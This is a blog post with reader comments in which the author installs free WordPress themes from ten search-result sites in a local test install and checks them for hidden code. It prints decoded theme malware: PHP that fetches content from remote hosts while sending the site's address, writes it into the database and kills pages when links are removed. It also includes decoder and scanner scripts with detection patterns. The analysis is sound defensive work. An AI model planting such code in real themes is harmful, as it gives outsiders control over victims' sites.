Update: I have written a post about where you can find free WordPress themes. So once you get to the end of this and are suitably concerned you can check it out for some great places to find your themes.
A few months ago I wrote about WordPress Security. Now, armed only with the words “free WordPress themes,” builtBackwards’ Theme Authenticity Checker Plugin and Donncha O Caoimh’s Exploit Scanner, I’m going to take a look through the first page of Google to see just how safe pages ranking for “Free WordPress Themes” are.

Note: I am not uploading any of these themes onto my server. Instead I have installed xampp and am running WordPress locally on my computer. I don’t advise uploading themes from random websites directly onto your server – you never know what you could catch! There are some nasty diseases out there…..

1. WordPressThemesBase
WordPress Themes Base is in the lucky position of being the top ranking site for “Free WordPress Themes.” Someone’s been working hard on their SEO! The blurb at the bottom tells the visitor that unlike other sites offering free WordPress themes, the themes at WordPress Themes Base are fresh. Great, there’s nothing better than a fresh theme.
I downloaded Prinz Branford Magazine. Already things are looking problematic. Branford Magazine is a theme released by der Prinz. There is a very old version of the theme which (as far as I can tell) isn’t up-to-date with WordPress 3.0 and a Pro was released earlier this year. That means we’re looking at either a theme that doesn’t work properly with WP 3.0 or a theme that is a knock-off of a pro.
First things first – install the theme and run it through TAC.

Encrypted code found! First site on Google and we’ve already come across Base64 :( Poor me….. Base64 is often used to hide malicious code. I can see that the code is in the footer. Let’s take a look at that:

Yeah, copyright me, damned right! But what is that Base64 hiding. Here it is in the footer code:
Lots of blah.
You can decode this base64 code in two ways:
- You can try Otto’s decoder – handy!
- You can also do it manually – this involves changing the eval() to an echo() to force whatever’s been hidden out of hiding. This post will walk you through the process.
I’ve gone for option 2. Turning my eval() into an echo() produced this result in my footer:
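As an added example of my own (not code from the original post or from any of the tools it mentions), here is a small Python script that does the eval() to echo() step statically: it finds the eval(base64_decode('…')), eval(str_rot13('…')) and eval(gzinflate(base64_decode('…'))) wrappers, decodes the quoted literal in Python and splices the result back in place, so the hidden code is revealed without ever being run. The footer it works on is a constructed sample, and example.invalid is a placeholder rather than a real site.

```python
import base64
import codecs
import re
import zlib

# A PHP string literal: a quote, the body (backslash escapes allowed), the same quote.
_LIT = r"""(['"])((?:\\.|(?!\1).)*)\1"""

# The eval() wrappers discussed on this page.  Order matters: the gzinflate
# form has to be tried before the plain base64 form it contains.
_WRAPPERS = [
    ("gzinflate+base64",
     re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*" + _LIT
                + r"\s*\)\s*\)\s*\)\s*;?", re.DOTALL)),
    ("base64",
     re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*" + _LIT + r"\s*\)\s*\)\s*;?", re.DOTALL)),
    ("rot13",
     re.compile(r"eval\s*\(\s*str_rot13\s*\(\s*" + _LIT + r"\s*\)\s*\)\s*;?", re.DOTALL)),
]


def _unquote(body):
    """Undo the backslash escapes a PHP literal needs for quotes and backslashes."""
    return re.sub(r"\\(['\"\\])", r"\1", body)


def _decode(kind, literal):
    """Decode one layer in Python: the safe equivalent of turning eval() into echo()."""
    if kind == "base64":
        return base64.b64decode(literal).decode("utf-8", "replace")
    if kind == "rot13":
        return codecs.decode(literal, "rot13")
    if kind == "gzinflate+base64":
        # PHP's gzinflate() is raw DEFLATE, which zlib reads with wbits = -15
        return zlib.decompress(base64.b64decode(literal), -15).decode("utf-8", "replace")
    raise ValueError(kind)


def reveal(php_source, max_layers=10):
    """Peel eval() wrappers until none are left; returns (revealed source, layers found)."""
    source, layers = php_source, []
    for _ in range(max_layers):
        hit = None
        for kind, rx in _WRAPPERS:
            m = rx.search(source)
            if m:
                hit = (kind, m)
                break
        if hit is None:
            break
        kind, m = hit
        layers.append(kind)
        # Splice the decoded code in exactly where the eval() call stood
        source = source[:m.start()] + _decode(kind, _unquote(m.group(2))) + source[m.end():]
    return source, layers


def wrap(php, kind):
    """Build a wrapper of the given kind (only used to construct the sample below)."""
    if kind == "base64":
        return "eval(base64_decode('%s'));" % base64.b64encode(php.encode()).decode()
    if kind == "rot13":
        body = codecs.encode(php, "rot13").replace("\\", "\\\\").replace("'", "\\'")
        return "eval(str_rot13('%s'));" % body
    if kind == "gzinflate+base64":
        c = zlib.compressobj(9, zlib.DEFLATED, -15)
        raw = c.compress(php.encode()) + c.flush()
        return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(raw).decode()
    raise ValueError(kind)


# Constructed sample: a footer whose visible copyright line is followed by a
# link hidden two layers deep (rot13 around base64), like the footer above.
# example.invalid is a placeholder, not a real site.
HIDDEN_PHP = 'echo \'<a href="http://example.invalid/">hidden sponsor link</a>\';'
SAMPLE_FOOTER = ("<?php\n/* copyright me */\n"
                 + wrap(wrap(HIDDEN_PHP, "base64"), "rot13")
                 + "\n?>")

if __name__ == "__main__":
    code, layers = reveal(SAMPLE_FOOTER)
    print("layers peeled:", layers)
    print(code)
```

Run against a real footer.php the same way (read the file, call reveal, and read the output) and the spliced-in code is what the eval() would have executed.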

Eh? A minute ago it said copyright me!!! Bah! Now there’s something about Free Anti-Virus Downloads. Where did that come from? Hidden by the base64 methinks.
The Verdict:
I downloaded another 2 themes from this site and they all contained base64 code. Base64 does not necessarily just hide links. It can also hide malicious code which can run amok on your site. Not only that but the site, while maintaining that its themes are fresh, is pushing themes built by other designers that the site owner has put base64 code into. I contacted Michael Oeser at der Prinz, who told me that he’s been trying to get in touch with the site about removing the theme but is having no luck. He’s posted a warning on his own blog about the dangers of downloading pirate themes. He’s the designer of Branford Magazine and his advice is to stay well away from sites like this – good advice!
My suggestion:
Avoid!
2. Free WordPress Themes
Another site with free WordPress themes. Great! Just what I need. I’m always after a good freebie. The first theme on the site is called BeautyStore. I like beauty stores so I’ll download that. Get it installed and run it through TAC.

More encrypted code!!!
Here it is in the footer:

For a beauty store it’s not all that beautiful. There are all sorts of encoded functions right in the footer. This time when I turned my eval()s into echo()s I couldn’t get anything to appear. I ran it through a few decoders and it’s far too jumbled up for me :(
Exploit scanner dislikes it as much as I do:

All of these came up as severe warnings.
The Verdict
2nd site on Google and we’re getting more base64. I downloaded a few other themes which contained static links and no base64. I guess that this site is a bit hit and miss. However, with the previous site I could get it decoded and with this one, no go. A search on some forums for the pieces of code in the footer indicates that it may be encrypted code used for hacking :( I ain’t techie enough to know and I suspect that most WordPress users aren’t either. In that case….
My Suggestion
Avoid!
3. Themes2WP
Scanning through the themes on Themes2WP they’ve certainly got some tempting ones on there. Let’s take a look at Gameliso which looks like a nicely designed magazine theme.
Theme Authenticity Checker says that it has found 5 static links. Static links are okay, right? A developer’s got to link back to their site. Here are the links:

Hmmmmm… I don’t know about you, but I don’t know if singles sites and animal care sites have much to do with theme development. Let’s take a closer look at the code in footer.php:

There are the links, with the helpful message: “Please do not edit following code, it may cause your site to stop working.” What useful information!!!! I would’ve gone and removed the links and broken the whole thing. Phew.
Oh wait… I did remove them and the site still seems to be working.
There’s another link in sidebar.php. Here it is:
Now to check out the styles for ad_lnk:

Wow! That’s a link that’s way out in the middle of nowhere. Can’t be for much except back-linking programmes.
So we’ve checked out the links – let’s run exploit scanner.
Gameliso is picked up as containing an eval() which could be used to execute malicious code. It’s not the type of thing that you want to have showing up in your theme.
The Verdict
Nice themes but contain 5 backlinks to random people who you probably aren’t interested in linking to. It goes so far as to tell you that if you remove the links your theme won’t work. Of course, we know that this isn’t true – but a beginner WordPress user might think twice about removing them. As for the eval function, well it could be harmless but I don’t know enough about javascript (probably like many average WordPress users) to tell you if in this case it is or it isn’t.
My suggestion
Avoid!
4. FreeWPThemes
After assuming that all sites that aren’t WordPress.org are bad, I was surprised to find no odd embedded links in any of the themes that I downloaded from FreeWPThemes. I downloaded 5 themes, from across the site. And they all had the same links:
None of these appear at all out of place. So, I felt a bit bad about my assumptions.
However, I did run the themes against the Theme Check Plugin. The plugin tests your theme to make sure it’s up to the latest theme review standards. Here’s how the Programme theme did:

Lots of errors! There’s even more than that but I couldn’t fit them all into the screenshot.
The Verdict
While the themes from FreeWPThemes might not live up to the exacting standards of the WordPress theme directory, there is nothing malicious about them, nor are there any backlinks. It may be that you come across things that aren’t working in quite the way that you want them to but there’s nothing hidden or evil about them!
My suggestion
Okay to use but check to make sure all of the functionality that you need is working.
5. WordPress.org
Finally! WordPress.org! We all know and love WordPress.org. It is the safest place to go to get your themes. I guess the problem that we all have with the theme repository is that many of the themes look like they were made back in the 1600s (or near enough). This can be frustrating, especially when many of them don’t work too well with WordPress 3.0. At the bottom of this post I’ll list some other safe places that are great for themes.
The Verdict
A totally trusted and safe place to get your free WordPress themes from.
My suggestion
<3
6. Themes.Rock Kitty
This site has a picture of a cat playing a guitar. I am easily pleased by things with cats on them. The first theme that I downloaded had no advertising links or hidden code in it, nor did the second. But the third came up with this:

More Base64!
This time changing my eval()s to echo()s produced this message:
The links at the bottom of the theme appear like this:
Exploit scanner came up with 17 severe warnings for this theme. Since there are only 4 links showing at the bottom I think we can assume that this theme is either packed full of hidden backlinks or there is something else going on.
The Verdict
Use this site very carefully. If you are going to download themes from them install the themes on your local machine and check them out first. This is another site where you could end up downloading a theme that hijacks your site. Be careful!
My suggestion
Avoid!
7. WP Themes Depot
Another website offering the most up-to-date, fresh, beautiful, free WordPress themes. This time I downloaded the most popular theme on the site, Niferiti, downloaded 980 times. Once again I ran it through TAC and came up with encrypted code:

After changing the eval() to an echo() I got this message (again):
Someone obviously doesn’t want me to get rid of the code. The links appear in the footer like so:
It feels a bit disingenuous to me to say that these are links from family and friends. Especially since we’ve seen that message before with different links. But I guess it’s possible that all spammy links come from the same family…… just maybe….. right?
Update: Okay, so I mustn’t have been paying attention to that message. I = doofus! Once again a lesson in reading things properly. In any case, links, whether family friendly or not, should not be hidden using encrypted code that is often used to mask other activity.
The Verdict
Another site with Base64 in the code. I guess I don’t have to repeat how untrustworthy code like this is. While it’s one thing for a developer to include backlinks it’s another when they use base64 to encode the links. Especially when it’s well known that the code is used to hide malware.
My suggestion
Avoid!
8. WPRex
I downloaded 5 themes from WPRex, the first two contained static spammy links and three others contained (surprise surprise) base64.

That’s Pink Desire. This time to decode it I used this decoder.
Here’s what it spat out:
More encrypted links. People do go to quite some lengths to hide their links!
The Verdict
Another site that is a bit hit and miss. If you must download themes from a place like this make sure you check out what it is you have by using something like TAC. You can also use some of the decoder tools I’ll list at the bottom to check out what any base64 is hiding.
My suggestion
Avoid!
9. No Limits Web Design
While this website has a slightly different name to all of the rest making me hope for something different, upon landing it has the similar announcement about all its great free WordPress themes. I downloaded one of the featured themes – Dark Night – and yet again found more base64 in the theme.

As well as the base64 I found a piece of code starting eval(str_rot13(. You can decode that here.
I got these results:
That’s basically the license. However, when I turned the eval to an echo this code appeared at the top of the page:
```php
function wp_code() { $default_link_text = "Default"; $link_host[] = "http://www.webspacehosting.com/wp_links/wp_links.php"; $link_host[] = "http://nolimitswebdesign.com/wp_links/wp_links.php"; $l = ""; foreach($link_host as $value) { if($file = @fopen($value."?url=".get_bloginfo('url'), "r")) { while (!feof ($file)) { $line = fgets ($file); $l .= $line; } fclose($file); break; } else { if ($value == end($link_host)) { $l=$default_link_text; } } } return $l; } function check_wp_code_sidebar() { $uri = strtolower($_SERVER["REQUEST_URI"]); if(is_admin() || substr_count($uri, "wp-admin") > 0 || substr_count($uri, "wp-login") > 0 ) { } else { $l=""; $f = dirname(__file__) . "/sidebar.php"; $fd = fopen($f, "r"); $c = fread($fd, filesize($f)); fclose($fd); if (strpos($c, $l) == 0) { die; } } } check_wp_code_sidebar();
```
I got one of our lovely Incsubbers to take a look at it and he translated it as:
```php
// Fetches link HTML from a remote "link host" for the sidebar; if every host
// is unreachable it falls back to the literal text "Default".
function wp_code() {
    $default_link_text = "Default";
    $link_host[] = "http://www.webspacehosting.com/wp_links/wp_links.php";
    $link_host[] = "http://nolimitswebdesign.com/wp_links/wp_links.php";
    $l = "";
    foreach ($link_host as $value) {
        // The blog's own URL is sent to the remote host with every request
        if ($file = @fopen($value . "?url=" . get_bloginfo('url'), "r")) {
            while (!feof($file)) {
                $line = fgets($file);
                $l .= $line;
            }
            fclose($file);
            break;
        } else {
            if ($value == end($link_host)) {
                $l = $default_link_text;
            }
        }
    }
    return $l;
}

// Runs on every front-end request: reads sidebar.php from disk and kills the
// page if the expected text is not found in it. Admin and login pages are
// exempted, so the site owner can still get into the dashboard.
function check_wp_code_sidebar() {
    $uri = strtolower($_SERVER["REQUEST_URI"]);
    if (is_admin() || substr_count($uri, "wp-admin") > 0 || substr_count($uri, "wp-login") > 0) {
    } else {
        $l = "";
        $f = dirname(__file__) . "/sidebar.php";
        $fd = fopen($f, "r");
        $c = fread($fd, filesize($f));
        fclose($fd);
        if (strpos($c, $l) == 0) { die; }
    }
}
check_wp_code_sidebar();
```
The theme pulls link HTML from those remote URLs into the sidebar, and if the expected links don’t appear in sidebar.php it calls die and the page stops rendering. Poor site :(
Here’s what exploit scanner has to say:
The Verdict
Another site using base64, another one to stay out of the way of. This one is even more encrypted than the others, which ended up showing much more quickly what they are up to.
My suggestion
Avoid!
Phew… getting to the end now… this is exhausting!
10. Templates Browser
Nearly at the end! Actually I did a little search about Templates Browser and found this post. So we can already guess what’s going to happen here. I downloaded the Dropshadow theme, which is actually by Brian Gardner but which you can no longer get from his site (probably because it’s pretty old and not WP 3.0 compatible). The TAC only found static links, like so:

The static link in the footer is a huge piece of PHP. The source code of the site reveals that it is calling a link to a casino site. However, it has some write elements which make me more suspicious. I got my friendly Incsubber to partially decode it:
```php
// Read the last-fetch timestamp and the cached link HTML out of wp_options
$l_time_code = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_code'");
$l_code = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_code'");

// First run: create both option rows so the later UPDATEs have something to hit
if (empty($l_time_code)) {
    $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_code', '0', 'no')");
    $new_time_code = 0;
} else
    $new_time_code = intval($l_time_code[0]);

if (empty($l_code)) {
    $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_code', '
', 'no')");
    $new_l_code = '
';
} else $new_l_code = $l_code[0];

// At most once a minute, fetch fresh content from the remote host, sending
// this site's hostname and the requested URI along with the request
if ( ( time() - $new_time_code ) >= 60 ) {
    // The hostname is assembled from pieces held in hash-named variables,
    // so it never appears in the file as one string
    $R39C188653EA53DBD6E3F1D3915EDAC0C = "com";
    $R8088818E3E46A17C12F2EE42EB12D7AC = "1.";
    $R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz";
    $xps = "xps.";
    $url = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C";
    $page = "/".$xps."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']);

    //1.xpstatz.com/xps.php?h=host&u=uri

    if (ini_get('allow_url_fopen')) {
        $new_l_code = @file_get_contents("http://" . $url . $page);
    }
    else {
        // Fallback when URL wrappers are disabled: a hand-rolled HTTP request over a socket
        $RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($url, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30);

        if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) {
            @stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60);
            @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $page HTTP/1.1\r\n");
            @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $url\r\n");
            @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Close\r\n\r\n");
            $new_l_code = "";
            while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) {
                $new_l_code .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024);
            }
            // Drop the HTTP headers and keep the body
            $new_l_code = trim(strstr($new_l_code, "\r\n\r\n"));
        }
        @fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38);
    }
    // Only a response carrying the [/] marker is accepted and written back to wp_options
    if ( strpos($new_l_code, '[/]') ) {
        $new_time_code = time();
        $R54997E66281827CBC285597040554FCC = mysql_escape_string($new_l_code);
        $wpdb->query("UPDATE $wpdb->options SET option_value=$new_time_code WHERE option_name='l_time_code'");
        $wpdb->query("UPDATE $wpdb->options SET option_value='$R54997E66281827CBC285597040554FCC' WHERE option_name='l_code'");
    }

}
// Output whatever sits between the [] and [/] markers into the footer
if ( strpos($new_l_code, '[/]') ) {
    $R3CB9CDAED257453CFA56B9EF81B44C57 = strpos($new_l_code, '[]') + 2;
    $R24D59CD0B76A27B85F35D40A3CF6EC37 = strrpos($new_l_code, '[/]');
    echo substr($new_l_code, $R3CB9CDAED257453CFA56B9EF81B44C57, $R24D59CD0B76A27B85F35D40A3CF6EC37-$R3CB9CDAED257453CFA56B9EF81B44C57);
    $RE762F29BDD39FF0A2ADF9AF4E6885799 = 1;
}
?>
```
Doesn’t mean a whole lot to me either….
But it stores the links in wp_options and checks every 60 seconds to grab the code from an external site. Then it updates the timecodes and links in the options table before outputting them in the footer.
Basically a much more complex method of doing everything that we’ve seen already.
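What TAC and Exploit Scanner are doing under the hood, as an added example of my own rather than either plugin’s code: a Python scanner that walks theme files line by line and flags the indicators seen on this page – eval(), the decode/inflate functions, the strrev('edoced_46esab') trick mentioned in the comments, remote fetches of link code, writes to $wpdb->options, die checks, and off-screen CSS like the ad_lnk style. The footer.php and sidebar.php inputs are constructed samples modelled on the code above; the rules and severities are my own assumptions.

```python
import re

# Indicator rules, my own assumptions modelled on what TAC and Exploit Scanner
# report: (name, severity, regex).  Checked per line so each hit carries a line number.
RULES = [
    ("eval()", "severe",
     re.compile(r"\beval\s*\(")),
    ("base64_decode()", "severe",
     re.compile(r"\bbase64_decode\s*\(")),
    ("str_rot13()/gzinflate()", "severe",
     re.compile(r"\b(?:str_rot13|gzinflate|gzuncompress)\s*\(")),
    ("reversed function name via strrev()", "severe",
     re.compile(r"\bstrrev\s*\(\s*['\"]([A-Za-z0-9_]+)['\"]\s*\)")),
    ("remote fetch of link code", "severe",
     re.compile(r"\b(?:fopen|file_get_contents)\s*\(\s*(?:['\"]https?://|\$\w+\s*\.)")),
    ("raw network socket", "severe",
     re.compile(r"\b(?:fsockopen|curl_init)\s*\(")),
    ("writes to wp_options", "warning",
     re.compile(r"(?:INSERT\s+INTO|UPDATE)\s+\$wpdb->options", re.IGNORECASE)),
    ("off-screen / hidden styling", "warning",
     re.compile(r"display\s*:\s*none|(?:left|top|text-indent)\s*:\s*-\d{4,}px")),
    ("die/exit (check whether it is tied to link presence)", "info",
     re.compile(r"\b(?:die|exit)\b")),
]

# Function names that obfuscators hide by spelling them backwards
DANGEROUS = {"base64_decode", "eval", "str_rot13", "gzinflate", "assert", "create_function"}


def scan_source(filename, source):
    """Return a list of (filename, lineno, severity, rule name) findings for one file."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, severity, rx in RULES:
            m = rx.search(line)
            if not m:
                continue
            # strrev() only matters when the reversed text is a dangerous
            # function name, e.g. 'edoced_46esab' -> base64_decode
            if name.startswith("reversed") and m.group(1)[::-1] not in DANGEROUS:
                continue
            findings.append((filename, lineno, severity, name))
    return findings


def scan_theme(files):
    """files maps filename -> source text; returns findings across the whole theme."""
    findings = []
    for filename, source in files.items():
        findings.extend(scan_source(filename, source))
    return findings


def summarize(findings):
    """Count findings per severity, the way a scanner report does."""
    counts = {}
    for _, _, severity, _ in findings:
        counts[severity] = counts.get(severity, 0) + 1
    return counts


# Constructed sample theme files (not real theme code), modelled on the footer
# and sidebar behaviour discussed above.  example.invalid is a placeholder.
SAMPLE_FILES = {
    "footer.php": (
        "<?php\n"
        "/* constructed sample footer, modelled on the code discussed above */\n"
        "$h = strrev('edoced_46esab');\n"
        "eval($h('BASE64_PAYLOAD_PLACEHOLDER'));\n"
        "$l = @file_get_contents('http://example.invalid/wp_links.php?url=' . get_bloginfo('url'));\n"
        "$wpdb->query(\"UPDATE $wpdb->options SET option_value='$l' WHERE option_name='l_code'\");\n"
        "echo $l;\n"
        "?>\n"
    ),
    "sidebar.php": (
        "<?php\n"
        "$c = fread(fopen(dirname(__FILE__) . '/sidebar.php', 'r'), 4096);\n"
        "if (strpos($c, 'sponsor') === false) { die; }\n"
        "?>\n"
        "<div class=\"ad_lnk\" style=\"position:absolute; left:-9999px\">sponsor</div>\n"
    ),
}

if __name__ == "__main__":
    for finding in scan_theme(SAMPLE_FILES):
        print("%s:%d [%s] %s" % finding)
    print(summarize(scan_theme(SAMPLE_FILES)))
```

A hit on die or on a local fopen is normal in plenty of clean themes, which is why those sit at the info level; the severe rules are the ones worth opening the file for.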
The Verdict
Things are already looking suspicious when another site is claiming that Templates Browser contains malware. And even more suspicious when they’re hawking an old theme which has been designed by an established WordPress designer. All of that code in the footer is not good, and is another way of taking control of your site.
My suggestion
Avoid!
Here’s a video from ThemeLab which does what I did, but quicker!
Conclusion
Out of the ten sites on the first page of Google, here are the stats:
- Safe: 1
- Iffy: 1
- Avoid: 8
8 out of 10 sites included base64 encoding in their themes. The average WordPress user no doubt knows that Google isn’t the best place to find themes but the stats on these sites show that there are thousands of people downloading them and using them on their websites. Someone who has come to WordPress for the first time is more than likely to type “free WordPress themes” into Google to find a site that gives them what they want. Unfortunately they’re more than likely to end up with spammy links, at best, on their site.
Of course, the WordPress Theme Directory can be frustrating in its lack of themes that work with WordPress 3.0. Many of the themes look a little out of date and lots look very bloggy. Here are some trusted sites where you can find free WordPress themes.
Free Themes
Premium Sites with some Free WordPress Themes
There are plenty more so look around! Don’t type free WordPress themes into Google though!
Tip: A legitimate site offering free WordPress themes will not have the word “WordPress” in its url. WordPress is trademarked and if a site is going to violate trademarks it’s likely to be unscrupulous about inserting spam and other code into themes. Here’s what WordPress have to say about it. (thanks to Jim - see comments below – for correcting me on that!!!!)
Decoders
If you are investigating a theme that you think is suspicious you might find the following decoding tools helpful (source):
- $o=
- Otto’s decoder
- $_F=__FILE__:
- eval(gzinflate(base64_decode('...')));
- eval(str_rot13(' ... '));
- Other codes
- Manual base64 decode
Useful Plugins
Further Reading
- Chip Bennett analyses the top 30 sites ranking for WordPress Themes on Google
- Otto on the Anatomy of a Theme Malware
- ThemeLab on why you should stop downloading WordPress Themes from shady sites
Hi Siobhan, thank you so much for this post. It’s something I tell clients all the time and also teach in my workshops. But taking the time to pull these samples and testing them, that’s awesome. I will certainly be sharing this post!
The working decoders we know of can be found here: http://wordpress.org/support/topic/how-to-decrypt-an-encoded-theme
I update that post from time to time when I either find a good decoder or write one. :)
Are you serious? This is one of the worst articles I’ve ever read on wpmu.org. I don’t even know where to begin, so I’ll start with one of the last things I bothered to read before deciding there was no real point in going on.
“It feels a bit disingenuous to me to say that these are links from family and friends. Especially since we’ve seen that message before with different links.”
Let’s not worry with the sentence structure and go right to the assumption made here that ‘family friendly’ would mean these are links from family and friends. Um. Here’s a link that maybe will clear that up a little: http://en.wikipedia.org/wiki/Family-friendly
So now that we’re past that little(?) bit of confusion, I’m right back to asking, “What the heck?!”
Yes, using eval to mask the links that you stuff into a theme is… lame. Yes, doing so in such a way that disables a theme if they are removed (and while one or more you checked didn’t work this way, there are several that do) is also lame. This doesn’t, however, mean anything malicious is necessarily going on.
Despite maligning a number of sites as being bad places for no particularly good reason, however, there were some good points. The eval() function can be used maliciously and if you don’t know how to work out what is and isn’t malicious it might be worth your while to be wary. Second, it’s horrible when people steal others’ themes, call them their own and then stuff them full of affiliate or back links, hidden or otherwise, for their own gain.
A few good points, but overall a shoddy article all in all.
One should be watching out for links without an anchor text. Those are the trickier ones to find :)
Thank you for your great work!!
So much time you spent on this research and screenshots.
I always knew these themes are not safe, but never expected 9 of 10 sites from SERP…….. I’m in shock.
Gave a link to this article in my blog.
Respect!
Thanks for your comments all.
Jay, yes you’re right, I totally mis-read that – obviously no excuse at all for it. But I’ve updated the article to account for your comment.
However, I did make the point a few times that there is not necessarily anything malicious going on. The point is that the average WordPress user will be unable to discern whether a base64 is being used to hide links or whether it is being used for something more malicious. To avoid picking up any malware I strongly suggest avoiding sites that use base64 encryption or eval() functions, altogether.
I’m sorry if you feel that I have maligned some good sites but I could never suggest that any of our readers download themes from sites that use encrypted code in their themes – that was 8 out of 10 websites that I tested.
Woah !! Lot of effort gone into this post. Thank You for sharing the results. I ‘only buy’ premium WordPress themes from Woo, StudioPress, Templatic & Themeforest. This post will enlighten those freebie seekers.
Wow! So much information, it is overwhelming. And yet, so important to the newbie WordPress user.
I learned the perils of free themes when I first started working with WordPress. It took me forever to get rid of the corrupt code, but it was a valuable lesson. Just like in life, most good things don’t come free. WordPress themes are no different. If you can’t afford to pay for a premium WordPress theme, plan on cleaning up your free theme.
In addition to your above list, I’d recommend ThemeForest.net. While not all theme designers provide solid themes and good support, Theme Forest has some rock stars and it is my first stop when seeking themes. Themes only cost about $30 and to me the quality and excellent support is priceless.
Hell of a marketing to the poor sites.
No wonder MediaTemple servers get so often unconsciously infected.
Ranking high such sites and alike, makes me have second thoughts about Google’s “Don’t be evil!” slogan.
Great research Siobhan.
This is a great post and highlights some of the problems Theme Jump (a small but growing theme directory) has been trying to solve. Hopefully more WP theme directories will start to pop up this year to help alleviate this issue.
I was doing a search for restaurant themes. I didn’t even include “free” in my search. A drive-by virus tried to infect my system.
Wow! I always knew free themes were suspect, but never had any idea so many of them were that dangerous. Thanks for showing us how to check for the bad stuff.
Thanks for sharing these excellent tips with us. Every WordPress beginner should read this. When I was starting out, I used to collect free WordPress themes so that I could use them in my work. I would like to share an experience here regarding these free WordPress themes.
I’ve kept the free WordPress themes which I downloaded from wordpressthemebase in a separate folder on my PC. One fine day, my antivirus system gave a warning about a particular piece of PHP code contained within one of the themes, saying that it was infected with a virus and needed to be deleted immediately. I quickly deleted that particular theme.
And the very next thing that happened is I kept getting the same warning message until I deleted the entire folder which contained all the free themes, and the warning was still showing until I emptied the recycle bin. The warning showed me that a particular piece of PHP code contained within the theme was suspicious spyware or malware. I’m sharing this story here because I don’t want any of you to go through this very same trouble in trying out these free themes.
Excellent work guys! Keep up the good work!
Really useful post; surprised me a little to see so much bad code in those themes! Was good to learn some new tricks at digging a little deeper into the code as well; especially about decoding! :)
You could also check out this great post for 100 top quality free WordPress themes: http://www.smashingmagazine.com/2010/08/19/100-free-high-quality-wordpress-themes-for-2010/
Great Article!
I’ve been telling people till I’m blue in the face that some free themes are riddled with junk and cheap ass noobs refuse to believe me.
Nice job on this one.
I’m linking to it from everywhere. Everyone that uses WordPress needs to read this.
Great article, Siobhan, and thanks for linking to my related post.
It would appear that you struck a chord with Jay Drake. Unfortunately for Jay, I agree with you completely. The Themes on every single one of these sites that add encoding (or worse) are outright crap. They’re not kept updated with current WordPress standards and features; they’re coded terribly, and most of them are ripped from legitimate Themes. Their entire raison d’etre is to push SEO/spam links. I guess Jay is okay with that; well, I’m not.
WordPress users should absolutely avoid these sites.
Very nice article!
I think it is very important to use an anti-virus plug-in for WordPress. Even if you are using some free wp plugins.
@Siobhan, @Chip: Agreed 100%. Great article, very enlightening and useful, and not only for the average WP user. Believe it or not, I create freelancer sites with WordPress and had no idea about base64 encoding.
Furthermore, I’d like to suggest this article could be the opener to another discussion framed by the question: What to expect when stuff is being labeled “free”?
I sure don’t mean to philosophize all over you, but isn’t it worth a second thought that most likely the more or less uninformed folks hunting for a “free” theme will fall prey to base64 tricks, while those who invest in learning a bit about WordPress and themes in the first place (which could be seen as nothing else but paying a price in real life-time hours of learning) more likely will avoid the headaches of a base64-hijacked site and ultimately have a greater experience with the product.
So, does the belief in getting something for “free”—that is: without giving anything in return— work in the end? Doesn’t seem so, does it?
Even if it’s life-time hours instead of dollars: the willingness to pay *some* kind of a price obviously makes a dot in the dividing line between the happy and the unhappy… eh …WordPress users. ;-)
The ugliest free WordPress themes are those that infect Word Press with viruses (for example: long code at the end of footer.php). I would rather pay for high-quality themes or frameworks.
Oh dear. Thanks for this post – it clearly approves my own experiences with searching for free templates on google. Recently I searched one for a new company and was also willing to pay for a premium theme – finally I pulled one from freewordpressthemes4u.com as I had very specific ideas what it should look like, and one of them fitted perfectly – so I thought. I installed and just wanted to slightly change the appearance – but hell, what a code! All of the contents were pulled from separate files, I worked about an hour in order just to find the passages to change in the files. However, there was so much code that I decided to have a break and check if the theme really is valid code – hell. The W3C validator just told me that there were plenty of errors – deprecated tags, undisclosed tags, and many more. The best of the story: they really want a donation of about 20 dollars in order to get the theme without sponsored links! What the hell – for this piece of crappy code I should pay?!
So I can also confirm: sometimes it’s really annoying to search for themes… :(
Good to know about this.
But I never worked on WordPress theme stuff.
Awesome work, really good to see the detail behind this. Have tweeted for you, you’ll get some decent traffic from my audience – many bloggers on WordPress. They’ll thank you for this – as do I.
I’ve designed a few themes in the past. I’ll be honest, my themes were crap. But had my link in the footer that most people were nice enough to leave in.
I’ve been approached by unscrupulous SEO companies in the past – wanting to put their links in the footer for payment. I refused, so they just did it anyway & distributed it.
Here’s the kicker, even though they submitted it to sites, they left me as the owner. So I got a few angry support requests on why I’ve screwed up their site due to removing code like above. I told them that I’d nothing to do with that version, and told them to download my themes. :)
A fantastic resource, thank you for this. Tweeted!
GREAT post, I had NO IDEA that free themes had nasty encrypted codes in them! This has come as a real shock to me, which sounds a little naive, I know!
Thanks for taking the time to do this and it’s great to see a post that is a little bit more interesting then ’10 great wordpress themes’ which you see sprout up every now and again :)
I have used one free theme so far; the rest are premium. The name of the theme is “SimpleFolio”. I wish there were a code review for this as well. Now I’m in a dilemma: should I remove it or keep it? I had done a lot of look & feel customization.
Thanks for the article.
Phew! Thanks for all of your comments and retweets guys! I’m glad you’re all finding it so useful and I hope it helps to put people off from downloading their themes from just anywhere that crops up on Google.
